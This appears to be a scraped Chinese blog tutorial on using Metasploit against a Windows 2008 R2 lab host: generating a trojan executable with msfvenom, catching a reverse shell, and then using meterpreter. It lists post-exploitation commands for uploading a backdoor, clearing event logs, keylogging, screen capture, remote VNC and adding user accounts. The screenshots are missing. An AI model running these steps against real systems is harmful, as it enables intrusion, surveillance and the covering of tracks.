天天看點

msf rhosts設定檔案_MSF入侵Windows之實戰

原理:

  利用msf子產品中的msfvenom子產品,生成123.exe木馬檔案,用靶機打開,攻擊成功後,就滲透到了靶機系統中。

準備:

  靶機:windows 2008 r2  

  ip:192.168.100.20

  攻擊主機:kali         

  ip:192.168.100.21

實戰:

1、     檢視攻擊主機ip

msf rhosts設定檔案_MSF入侵Windows之實戰

2、     生成123.exe木馬檔案

msf rhosts設定檔案_MSF入侵Windows之實戰

3、     将制作好的木馬檔案放到目标機内

msf rhosts設定檔案_MSF入侵Windows之實戰

4、     啟動msfconsole進入msf

msf rhosts設定檔案_MSF入侵Windows之實戰

5、     加載exploit/multi/handler,設定payload反彈,設定LHOS反彈位址

msf rhosts設定檔案_MSF入侵Windows之實戰

6、     show options檢視所設定的内容

msf rhosts設定檔案_MSF入侵Windows之實戰

7、     設定好後,直接exploit,開始攻擊,等待目标靶機中招

msf rhosts設定檔案_MSF入侵Windows之實戰

8、     當靶機中招後,獲得反彈shell,滲透成功

msf rhosts設定檔案_MSF入侵Windows之實戰

9、     此時我們就可以對靶機進行操作了

msf rhosts設定檔案_MSF入侵Windows之實戰

10、     如果出現了亂碼現象,這是編碼的問題,在終端->修改編碼->改成中文的GBK退出再次shell即可解決

msf rhosts設定檔案_MSF入侵Windows之實戰

11、     meterpreter下的部分指令總結:

getwd目前目錄

msf rhosts設定檔案_MSF入侵Windows之實戰

dir檢視所有檔案

msf rhosts設定檔案_MSF入侵Windows之實戰

cat111.txt 檢視檔案111.txt内容

msf rhosts設定檔案_MSF入侵Windows之實戰

search-f cmd.exe (搜尋名為123.exe檔案所在目錄)

msf rhosts設定檔案_MSF入侵Windows之實戰

upload/root/桌面/backldoor.exe(要上傳的檔案) -> c:\(上傳到的目錄) 上傳檔案

msf rhosts設定檔案_MSF入侵Windows之實戰

downloadc:\123txt /root 下載下傳檔案

msf rhosts設定檔案_MSF入侵Windows之實戰
msf rhosts設定檔案_MSF入侵Windows之實戰

clearev清除日志

msf rhosts設定檔案_MSF入侵Windows之實戰

getuid目前使用者

msf rhosts設定檔案_MSF入侵Windows之實戰

ps 檢視所用程序

msf rhosts設定檔案_MSF入侵Windows之實戰

sysinfo系統資訊

msf rhosts設定檔案_MSF入侵Windows之實戰

keyscan_start開始鍵盤記錄

keyscan_stop停止鍵盤記錄

keyscan_dump檢視結果

msf rhosts設定檔案_MSF入侵Windows之實戰

螢幕截圖

screenshot

msf rhosts設定檔案_MSF入侵Windows之實戰
msf rhosts設定檔案_MSF入侵Windows之實戰

螢幕監控

runvnc

msf rhosts設定檔案_MSF入侵Windows之實戰
msf rhosts設定檔案_MSF入侵Windows之實戰

shell

擷取shell,進入cmd

msf rhosts設定檔案_MSF入侵Windows之實戰

netuser 使用者名 密碼 /add 添加使用者(jeff/Abc!23)

msf rhosts設定檔案_MSF入侵Windows之實戰

netuser 使用者名 密碼 更改使用者密碼(jeff/[email protected])

msf rhosts設定檔案_MSF入侵Windows之實戰

最後,本次實驗僅是僅供實驗,切勿用于實戰,否則後果自負!